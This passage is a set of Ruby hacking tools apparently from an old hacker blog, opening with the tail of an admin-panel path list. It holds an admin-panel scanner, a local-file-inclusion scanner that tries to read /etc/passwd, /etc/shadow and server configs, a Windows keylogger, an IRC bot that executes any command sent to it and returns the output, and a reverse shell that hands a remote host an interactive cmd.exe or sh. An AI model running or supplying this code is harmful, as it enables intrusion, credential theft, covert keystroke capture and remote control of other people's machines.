,'admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']

require 'net/http'


def uso
  print "\n[+] panelcontol.rb <site>\n"
end

def toma(web)
   return Net::HTTP.get_response(web)
   end
  

def scan(web,panels)
  print "\n[+] Starting the scan...\n\n\n"
  panels.each do |panel|
  begin
  begin
  code = toma(URI.parse(web+"/"+panel))
  rescue
  copyright()
  end
  case code
  when Net::HTTPSuccess
  print "[Link] : "+web+"/"+panel+"\n"
end
end
end 
end

def head() 
  print "\n\n -- == Panel Control == --\n\n"
end

def copyright() 
   print "\n\n\n(C) Doddy Hackman 2010\n\n"
   exit(1)
 end
 
head()
if !ARGV[0] 
  uso()
else 
  scan(ARGV[0],panels)  
end
copyright()

#!usr/bin/ruby
#LFI tool (C) Doddy Hackman 2010 
#contact me : doddy-hackman.blogspot.com

require 'net/http'


def uso
  print "\n[+] lfi.rb <site>\n"
end

def toma(host,path)
  http = Net::HTTP.new(host,80)
  return http.get(path).body
end

def fuzz(web) 
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
 files.each do |file|
begin
 url = URI.parse(web)
 code = toma(url.host,url.path+"?"+url.query+file)
 if not code=~/No such file or directory in/
   print "[Link] : "+web+file+"\n"
 end
 end
end
end


def scan(web)
  print "\n[+] Testing the vulnerability LFI...\n\n"
  begin
  url = URI.parse(web)
  code = toma(url.host,url.path+"?"+url.query+"'")
  if code=~/No such file or directory in/
   saca = code.split("No such file or directory in <b>")
   saca = saca[1].split("<\/b> on line")
   print "[+] LFI Detected\n\n"
   print "[Full Path Discloure]: "+saca[0]+"\n"
   print "\n\n[+] Fuzzing Files\n\n"
   fuzz(web)
   print "\n[+] Finish\n"
  copyright()
  else
    print "[-] Not Vulnerable to LFI\n\n"
end
end
end

def head() 
  print "\n\n -- == LFI tOOL == --\n\n"
end

def copyright() 
   print "\n\n\n(C) Doddy Hackman 2010\n\n"
   exit(1)
 end
 
head()
if !ARGV[0] 
  uso()
else 
  scan(ARGV[0])  
end
copyright()

#!usr/bin/ruby
#Simple Keylogger in Ruby
#(C) Doddy Hackman 2011

require 'Win32API'

def savefile(filename,text)
files = File.open(filename,'a')
files.puts text+"\n"
end

def capturar

nave = Win32API.new("user32","GetAsyncKeyState",["i"],"i")

while 1

for num1 in (0x30..0x39) #numbers
if nave.call(num1) & 0x01 == 1 
savefile("logs.txt",num1.chr())
end
end

for num2 in (0x41..0x5A) #letters
if nave.call(num2) & 0x01 == 1 
savefile("logs.txt",num2.chr())
end
end
end	
end

capturar() #Start the keylogger

# ¿ The End ?

#!usr/bin/ruby
#IRC Bot (C) Doddy Hackman 2011

host = "localhost"
canal = "#locos"
botname = "aa"

def head() 
print "\n\n == -- IRC BOT -- ==\n\n"
end
 
def uso() 
print "\n[+] Sintax : #{$0} <host> <channel> <bot name>\n"
end

def copyright()
print "\n\n(C) Doddy Hackman 2011\n\n"
end

def load(host,canal,botname)
begin
irc = TCPSocket.open(host,6667)
rescue 
print "\n\n[-] Error\n\n"
else 
irc.print "NICK #{botname}\r\n"
irc.print "USER #{botname} 1 1 1 1\r\n"
irc.print "JOIN #{canal}\r\n"

print "\n\n[+] Online\n\n"

while 1 

code = irc.recv(666)	

if (code=~/PING (.*)/) 
irc.print "PONG #{$1}\n"
end

#if code=~/:(.*)!(.*):(.*)/
#print "Un tal : #{$1}\n"
#print "Dijo : #{$3}\n"
#end

if code=~/cmdnow :(.*):/
re = IO.popen($1).read
re = re.gsub("\n","|")
irc.print "PRIVMSG #locos : ",re,"\r\n"	
end
end
end
end

head()
load(host,canal,botname)
copyright()


# ¿ The End ? 

#!usr/bin/ruby
#Back Shell (C) Doddy HAckman 2010
#Creditos : protos por darle vida a un lenguaje casi olvidado  en este mundo

require 'socket'

ip = ARGV[0]
port = ARGV[1]

def uso 
  print "\n[+] bind.rb <ip> <port>\n"
end

def  head
  print "\n\n-- == ReverseShell By Doddy H == --\n\n"
end

def copyright
  print "\n\n(C) Doddy Hackman 2010\n\n"
end


def infowin
  system("net user")
end

def openwin()
 system("cmd.exe")
 end  
 
 def infolin
  system("uname -a")
end

def openlin()
 system("export TERM=xterm;exec sh -i")
 end  

def now(ip,port)
  print "\n\n-- == ReverseShell By Doddy H == --\n\n"
  print "\n[+] Ok , enter to the system\n\n"
 begin 
 backdoor = TCPSocket.new(ip,port)
  $stdout.reopen(backdoor) 
  $stdin.reopen(backdoor)
  rescue
  print "\n[-] Un puto error !!\n\n"
  exit(1)   
  end
  if RUBY_PLATFORM =~/win/
   infowin()
   openwin()
  else 
   infolin()
   openlin()
end
end

 
if !ip and !port
 uso()
else
  now(ip,port)
end

#The End ???